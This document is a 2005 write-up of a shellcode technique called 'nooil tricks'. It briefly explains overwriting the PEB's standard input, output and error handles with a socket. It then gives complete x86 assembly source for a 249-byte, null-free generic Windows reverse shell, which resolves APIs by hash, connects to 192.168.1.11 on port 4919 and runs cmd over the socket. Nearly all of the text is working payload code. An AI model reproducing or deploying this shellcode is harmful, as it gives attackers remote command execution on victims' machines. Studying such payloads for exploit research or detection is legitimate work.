We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS PARAMETERS ProcessParameters ; ... typedef struct RTL USER PROCESS PARAMETERS ULONG MaximumLength ; ULONG Length ; ULONG Flags ; ULONG DebugFlags ; PVOID ConsoleHandle ; ULONG ConsoleFlags ; HANDLE StdInputHandle ; +18h HANDLE StdOutputHandle ; +1Ch HANDLE StdErrorHandle ; +20h ... So with the nooil tricks we have now : mov eax,dword ptr fs :[18h] mov eax,dword ptr ds :[eax+30h] mov eax,dword ptr ds :[eax+10h] mov ecx, hClientSocket mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ; mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ; mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ; 249 bytes Reverse Generic Shellcode without loader(no null byte) : comment * ----------------------------------------------------------------- ---- New generation shellcode using my "nooil tricks" methods --- ---- (c) 2005 - Matthieu Suiche / msuiche@gmail.com --- 249 bytes Reverse Generic Shellcode without loader(no null byte) ----------------------------------------------------------------- hehe hi metasploit's guys ;) * .386 .model flat, stdcall assume fs:nothing LoadLibraryA equ 0D6C3D898h WSAStartupA equ 0C7B3B4CBh WSASocketA equ 0B8ACB6C6h connect equ 06EE2D2C8h system equ 0E873E6D8h ExitProcessA equ 0D7D8EA95h ; ------------------------------ sin_addr equ 0B01A8C0h ; 192.168.1.11 sin_port equ 3713h ; 4919 ; ------------------------------ str_cmd equ 0FF646D63h ; ---------------------------------------------------- _nooil_ segment public ; writable section ;. ; ----- CODE ----- scode: jmp short _eip GetEip: pop edi jmp short EntryPoint _eip: call GetEip Kernel32BaseAddr: pushad test eax, eax jnz MyGetProcAddr ; eax = 0 mov eax, dword ptr fs:[eax+30h] mov eax, dword ptr ds:[eax+0ch] mov esi, dword ptr ds:[eax+1ch] lodsd mov eax, dword ptr ds:[eax+08h] MyGetProcAddr: mov edx, eax ; - PE add edx, dword ptr ds:[edx+3ch] ; - Export Table mov edx, dword ptr ds:[edx+78h] add edx, eax mov ebx, dword ptr ds:[edx+20h] add ebx, eax xor ecx, ecx mov ebp, eax FindAddr: inc ecx mov edi, dword ptr ds:[ebx+ecx*4] add edi, eax mov esi, dword ptr [edi] add esi, dword ptr [edi+4] cmp esi, [esp+36] jz AddrFound jmp short FindAddr AddrFound: mov ebx, dword ptr ds:[edx+24h] add ebx, ebp mov cx,word ptr ds:[ebx+ecx*2] mov ebx, dword ptr ds:[edx+1Ch] add ebx, ebp add ebp, dword ptr ds:[ebx+ecx*4] mov dword ptr [esp+28], ebp popad retn EntryPoint: xor eax, eax xor ecx, ecx push LoadLibraryA call edi ; MyGetProcAddr(LoadLibraryA); mov ebp, eax push cx push word ptr '23' push '_2sw' push esp call eax ; LoadLibraryA("ws2_32"); mov ebx, eax push WSAStartupA call edi ; MyGetProcAddr(WSAStartupA) mov esi, esp add si, -301h push esi push 2 call eax ; WSAStartup(2,&WSAstruct); mov eax, ebx push WSASocketA call edi ; MyGetProcAddr(WSASocketA); xor esi, esi push esi push esi push esi push esi inc esi push esi inc esi push esi call eax ; WSASocket(2,1,0,0,0,0); xchg ebx, eax ; ebx = sockfd , eax = ws2_32 push sin_addr push word ptr sin_port push si mov esi, esp push connect call edi ; MyGetProcAddr(connect) push 10h push esi push ebx call eax ; connect(sockfd, &struct, sizeof(struct)); push ax push word ptr 'tr' push 'cvsm' push esp call ebp ; LoadLibraryA("msvcrt"); push system call edi ; MyGetProcAddr(system); ; ----------------------------- nooil tricks ---------------------------------- xor ecx, ecx mov ecx,dword ptr fs:[ecx+18h] mov ecx,dword ptr ds:[ecx+30h] mov ecx,dword ptr ds:[ecx+10h] mov dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient); mov dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient); mov dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient); ; ----------------------------------------------------------------------------- push str_cmd inc byte ptr [esp+3] push esp call eax ; system("cmd"); ; Exit push ExitProcessA call edi ; MyGetProcAddr(ExitProcessA) call eax ; ExitProcessA(); end scode ; ------ END CODE ------ ;. _nooil_ ends ; ----------------------------------------------------